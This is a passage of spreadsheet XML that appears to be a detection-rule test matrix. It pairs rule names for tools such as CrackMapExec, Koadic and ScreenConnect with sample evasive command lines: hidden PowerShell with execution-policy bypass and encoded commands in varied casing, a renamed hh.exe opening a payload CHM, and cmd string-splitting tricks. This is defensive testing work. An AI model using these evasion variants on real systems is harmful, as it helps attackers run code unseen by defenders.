          <t>powershell.exe -NOproFile -EXEcuTiOnpOLiCY Bypass -"WindowStyle" Hidden -EnCOdEdcomMaNd UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F636" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G636" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H636" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I636" s="43" t="n"/>
      <c r="J636" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K636" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="637" ht="15.75" customHeight="1" s="42">
      <c r="A637" s="43" t="n"/>
      <c r="B637" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C637" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D637" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E637" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F637" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G637" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H637" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I637" s="43" t="n"/>
      <c r="J637" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K637" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="638" ht="15.75" customHeight="1" s="42">
      <c r="A638" s="43" t="n"/>
      <c r="B638" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C638" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D638" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E638" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"NoProfile" -wINdoWStyLE Hidden -enCODEDCOMmaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F638" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G638" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H638" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I638" s="43" t="n"/>
      <c r="J638" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K638" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="639" ht="15.75" customHeight="1" s="42">
      <c r="A639" s="43" t="n"/>
      <c r="B639" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C639" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D639" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E639" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass /"NoProfile" -ws Hidden -"EncodedCommand" &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F639" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G639" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H639" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I639" s="43" t="n"/>
      <c r="J639" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K639" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="640" ht="15.75" customHeight="1" s="42">
      <c r="A640" s="43" t="n"/>
      <c r="B640" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C640" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D640" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E640" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -NOPROfIlE -ws Hidden -ENcodedcoMMaNd &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F640" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G640" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H640" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I640" s="44" t="n"/>
      <c r="J640" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K640" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="641" ht="15.75" customHeight="1" s="42">
      <c r="A641" s="43" t="n"/>
      <c r="B641" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C641" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D641" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E641" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -WiNdoWsTYLe Hidden -EncOdedcommanD &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I641" s="43" t="n"/>
      <c r="J641" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K641" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="642" ht="15.75" customHeight="1" s="42">
      <c r="A642" s="43" t="n"/>
      <c r="B642" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C642" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D642" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E642" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXECUTIonPOliCY Bypass -NOPrOFiLe -ws Hidden -enCOdEDcOmmaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F642" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G642" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H642" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I642" s="43" t="n"/>
      <c r="J642" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K642" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="643" ht="15.75" customHeight="1" s="42">
      <c r="A643" s="43" t="n"/>
      <c r="B643" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C643" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D643" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E643" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -noPRoFile /"WindowStyle" Hidden -enc &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I643" s="43" t="n"/>
      <c r="J643" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K643" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="644" ht="15.75" customHeight="1" s="42">
      <c r="A644" s="43" t="n"/>
      <c r="B644" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C644" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D644" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E644" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -ws Hidden -enc &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I644" s="44" t="n"/>
      <c r="J644" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K644" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="645" ht="15.75" customHeight="1" s="42">
      <c r="A645" s="43" t="n"/>
      <c r="B645" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C645" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D645" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E645" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -NoProfILe -windOWstYLe Hidden -EncODEdCOMmANd &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F645" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G645" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H645" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I645" s="43" t="n"/>
      <c r="J645" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K645" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="646" ht="15.75" customHeight="1" s="42">
      <c r="A646" s="43" t="n"/>
      <c r="B646" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C646" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D646" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E646" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -nop -ws Hidden -eNcoDEDcommaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I646" s="43" t="n"/>
      <c r="J646" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K646" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="647" ht="15.75" customHeight="1" s="42">
      <c r="A647" s="43" t="n"/>
      <c r="B647" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C647" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D647" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E647" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q /c "ch""cp" 1252</t>
        </is>
      </c>
      <c r="F647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I647" s="43" t="n"/>
      <c r="J647" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K647" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="648" ht="15.75" customHeight="1" s="42">
      <c r="A648" s="44" t="n"/>
      <c r="B648" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C648" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D648" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E648" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\Temp\t^mp.bat"</t>
        </is>
      </c>
      <c r="F648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I648" s="44" t="n"/>
      <c r="J648" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K648" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="649" ht="15.75" customHeight="1" s="42">
      <c r="A649" s="44" t="n"/>
      <c r="B649" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C649" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D649" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E649" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\Temp &amp;&amp; tmp.bat"</t>
        </is>
      </c>
      <c r="F649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I649" s="44" t="n"/>
      <c r="J649" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K649" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="650" ht="15.75" customHeight="1" s="42">
      <c r="A650" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B650" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C650" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D650" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E650" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe "/EXEFilename" cmd.exe "/Run"</t>
        </is>
      </c>
      <c r="F650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I650" s="44" t="n"/>
      <c r="J650" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K650" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="651" ht="15.75" customHeight="1" s="42">
      <c r="A651" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B651" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C651" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D651" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E651" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe -EXEFilename cmd.exe -Run</t>
        </is>
      </c>
      <c r="F651" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G651" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H651" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I651" s="44" t="n"/>
      <c r="J651" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K651" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="652" ht="15.75" customHeight="1" s="42">
      <c r="A652" s="43" t="n"/>
      <c r="B652" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C652" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D652" s="44" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E652" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\TEMP\HiddenPath\23.6.8.8644\3c41d689-bbf5-4216-b2f4-ba8fd6192c25run.cmd"</t>
        </is>
      </c>
      <c r="F652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I652" s="43" t="n"/>
      <c r="J652" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K652" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="653" ht="15.75" customHeight="1" s="42">
      <c r="A653" s="43" t="n"/>
      <c r="B653" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C653" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D653" s="44" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E653" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -wIndOWSTyle Hidden -"File" C:\Windows\TEMP\ScreenConnect\23.6.8.8644\tool.ps1</t>
        </is>
      </c>
      <c r="F653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I653" s="43" t="n"/>
      <c r="J653" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K653" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="654" ht="15.75" customHeight="1" s="42">
      <c r="A654" s="43" t="n"/>
      <c r="B654" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C654" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D654" s="44" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E654" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"WindowStyle" Hidden -file C:\Windows\TEMP\ScreenConnect\23.6.8.8644\tool.ps1</t>
        </is>
      </c>
      <c r="F654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I654" s="43" t="n"/>
      <c r="J654" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K654" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="655" ht="15.75" customHeight="1" s="42">
      <c r="A655" s="43" t="n"/>
      <c r="B655" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C655" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D655" s="44" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E655" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -WiNdoWSTylE Hidden /"File" C:\Windows\TEMP\ScreenConnect\23.6.8.8644\tool.ps1</t>
        </is>
      </c>
      <c r="F655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I655" s="43" t="n"/>
      <c r="J655" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K655" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="656" ht="15.75" customHeight="1" s="42">
      <c r="A656" s="43" t="n"/>
      <c r="B656" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C656" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D656" s="44" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E656" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"WindowStyle" Hidden -"File" C:\Windows\TEMP\ScreenConnect\23.6.8.8644\tool.ps1</t>
        </is>
      </c>
      <c r="F656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I656" s="43" t="n"/>
      <c r="J656" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K656" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="657" ht="15.75" customHeight="1" s="42">
      <c r="A657" s="43" t="n"/>
      <c r="B657" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C657" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D657" s="44" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E657" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exEcuTIonPoLICY Bypass -wiNdowsTyLe Hidden /"File" C:\Windows\TEMP\ScreenConnect\23.6.8.8644\tool.ps1</t>
        </is>
      </c>
      <c r="F657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I657" s="43" t="n"/>
      <c r="J657" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K657" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="658" ht="15.75" customHeight="1" s="42">
      <c r="A658" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B658" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C658" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D658" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E658" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I658" s="43" t="n"/>
      <c r="J658" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K658" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="659" ht="15.75" customHeight="1" s="42">
      <c r="A659" s="43" t="n"/>
      <c r="B659" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C659" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D659" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E659" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q /c "ch""cp" 1252</t>
        </is>
      </c>
      <c r="F659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I659" s="43" t="n"/>
      <c r="J659" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K659" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="660" ht="15.75" customHeight="1" s="42">
      <c r="A660" s="43" t="n"/>
      <c r="B660" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C660" s="44" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D660" s="44" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E660" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set str1=gather &amp; set str2=NetworkInfo.vbs &amp; call wscript.exe C:\Windows\System32\%str1%%str2%"</t>
        </is>
      </c>
      <c r="F660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I660" s="43" t="n"/>
      <c r="J660" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K660" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="661" ht="15.75" customHeight="1" s="42">
      <c r="A661" s="43" t="n"/>
      <c r="B661" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C661" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D661" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E661" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /node:localhost process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I661" s="44" t="n"/>
      <c r="J661" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K661" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="662" ht="15.75" customHeight="1" s="42">
      <c r="A662" s="43" t="n"/>
      <c r="B662" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C662" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D662" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E662" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe -"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I662" s="44" t="n"/>
      <c r="J662" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K662" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="663" ht="15.75" customHeight="1" s="42">
      <c r="A663" s="43" t="n"/>
      <c r="B663" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C663" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D663" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E663" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I663" s="44" t="n"/>
      <c r="J663" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K663" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="664" ht="15.75" customHeight="1" s="42">
      <c r="A664" s="43" t="n"/>
      <c r="B664" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C664" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D664" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E664" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /noDe:LOCALhosT process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I664" s="43" t="n"/>
      <c r="J664" s="44" t="n">
        <v>0</v>
      </c>
